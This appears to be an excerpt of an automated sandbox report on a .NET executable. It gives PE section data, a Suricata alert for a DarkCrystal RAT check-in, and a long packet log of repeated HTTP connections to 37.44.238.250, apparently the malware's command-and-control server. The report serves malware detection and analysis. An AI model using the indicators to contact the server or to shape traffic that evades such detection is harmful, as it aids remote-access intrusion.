.rsrc	0x1d6000	0x320	0x400	3720f37e3ecb95f78fcf18a649002524	False	0.3525390625	data	2.6537284131589467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1d8000	0xc	0x200	26c91b83cf10be5da628cca736656f2f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1d6058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T22:37:25.654935+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49735	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 22:37:24.079433918 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:24.199579000 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:24.199656963 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:24.200252056 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:24.320590973 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:24.552634954 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:24.672735929 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:25.563438892 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:25.654736042 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:25.654778957 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:25.654934883 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.022404909 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.142549038 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.404103041 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.447812080 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.489132881 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.499485970 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.525095940 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.619589090 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.619744062 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.619879961 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.739799023 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.907330036 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:26.973841906 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:26.988943100 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:27.094122887 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:27.112405062 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:27.232391119 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:27.458170891 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:27.537733078 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:27.578293085 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:27.578416109 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:27.692069054 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:27.949363947 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:28.192080975 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:28.192981958 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:28.253985882 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:28.379580021 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:28.379784107 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.205679893 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.209321022 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.209322929 CET	49740	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.213980913 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.326659918 CET	80	49735	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.326870918 CET	49735	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.329606056 CET	80	49740	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.329622984 CET	80	49737	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.329687119 CET	49740	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.329777002 CET	49737	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.334043026 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.334163904 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.337615967 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.457606077 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.477662086 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.597656012 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.597948074 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.598079920 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.693675041 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.718817949 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814131021 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814167976 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814203024 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814230919 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814251900 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.814322948 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814352036 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.814367056 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814400911 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.814436913 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.814455986 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.838656902 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.838711977 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.838745117 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.838777065 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.838836908 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.934941053 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.934973955 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.935028076 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.935065031 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.935086966 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.935122967 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.935122967 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.935162067 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.935183048 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.942369938 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:30.975588083 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:30.977726936 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.062530041 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.095612049 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.095683098 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.139591932 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.139666080 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.259718895 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.303647995 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.303730011 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.318133116 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.318288088 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.423777103 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.423842907 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.438371897 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438419104 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438436031 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.438472986 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.438476086 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438513041 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438519955 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.438570023 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438599110 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438678026 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438776970 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438868046 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438896894 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.438971043 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439026117 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439119101 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439194918 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439249039 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439281940 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439410925 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439465046 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439495087 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439631939 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439662933 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439694881 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439840078 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.439873934 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440068960 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440139055 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440167904 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440258026 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440309048 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440465927 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440519094 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.440546036 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.544097900 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.558909893 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.559026957 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.559055090 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.605783939 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.701005936 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:31.869162083 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:31.988301992 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.103615999 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:32.207719088 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.288007975 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.309266090 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.408559084 CET	80	49742	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:32.408649921 CET	49742	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.429368019 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:32.429450989 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.429589033 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.505794048 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:32.549833059 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:32.707734108 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.785919905 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:32.906107903 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.270744085 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.272494078 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.391331911 CET	80	49741	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.391402960 CET	49741	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.392513990 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.392626047 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.392748117 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.513030052 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.739078045 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.750293016 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.859137058 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.859180927 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:33.879632950 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:33.992778063 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.089603901 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.352444887 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.353302002 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.472866058 CET	80	49744	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.472956896 CET	49744	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.473253012 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.473351002 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.473522902 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.593404055 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.713066101 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.801511049 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.832802057 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:34.952899933 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:34.961298943 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:35.004630089 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:35.790175915 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:35.895267010 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.032893896 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:36.162935019 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.162983894 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.163850069 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.283509970 CET	80	49745	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:36.283579111 CET	49745	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.283879042 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:36.283953905 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.284053087 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.284254074 CET	80	49746	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:36.284650087 CET	49746	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.404311895 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:36.667327881 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:36.787435055 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:37.646228075 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:37.707768917 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:37.902936935 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:38.004631042 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.059025049 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.060122967 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.179828882 CET	80	49748	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:38.179893970 CET	49748	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.180059910 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:38.180139065 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.180342913 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.300292015 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:38.535978079 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:38.656244040 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:39.496450901 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:39.692132950 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:39.740746021 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:39.879647970 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:39.944993019 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:39.952368975 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:39.974581957 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.065598011 CET	80	49750	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.065654993 CET	49750	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.072349072 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.072427034 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.072571039 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.094628096 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.094703913 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.095246077 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.192742109 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.215171099 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.426644087 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.442308903 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:40.546704054 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.562351942 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:40.562745094 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.354441881 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.395287991 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.479908943 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.587713957 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.593700886 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.706710100 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.709712029 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.714226007 CET	80	49752	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.714361906 CET	49752	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.827187061 CET	80	49751	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.829125881 CET	49751	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.829705954 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:41.829812050 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.830177069 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:41.950273037 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:42.176837921 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:42.297116041 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:43.192138910 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:43.395278931 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.446218967 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:43.504652023 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.570055008 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.570719957 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.690532923 CET	80	49753	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:43.690618992 CET	49753	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.690804958 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:43.690895081 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.691044092 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:43.810972929 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:44.036031008 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:44.156385899 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.007061958 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.207973003 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.249711037 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.395315886 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.473047018 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.477349043 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.593507051 CET	80	49754	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.593658924 CET	49754	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.597290039 CET	80	49755	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.597528934 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.597682953 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:45.717819929 CET	80	49755	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:45.942336082 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.062702894 CET	80	49755	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:46.599241972 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.601083040 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.719871044 CET	80	49755	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:46.719933987 CET	49755	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.721096992 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:46.721170902 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.721268892 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.760601044 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.841202021 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:46.880657911 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:46.880734921 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:46.880842924 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:47.000785112 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:47.067822933 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:47.188054085 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:47.188069105 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:47.241985083 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:47.362082005 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.024573088 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.175981998 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.207859993 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.259761095 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.343491077 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.379697084 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.415868044 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.489073038 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.542016029 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.542124033 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.542768955 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.662424088 CET	80	49756	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.662552118 CET	49756	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.662939072 CET	80	49758	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.662971020 CET	80	49757	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:48.663009882 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.663034916 CET	49757	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.663162947 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:48.783365011 CET	80	49758	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:49.020395994 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:49.140680075 CET	80	49758	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:50.025518894 CET	80	49758	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:50.192190886 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:50.278217077 CET	80	49758	37.44.238.250	192.168.2.4
Nov 25, 2024 22:37:50.379702091 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:50.965192080 CET	49758	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:50.966018915 CET	49759	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:37:51.085985899 CET	80	49758	37.44.238.250	192.168.2.4
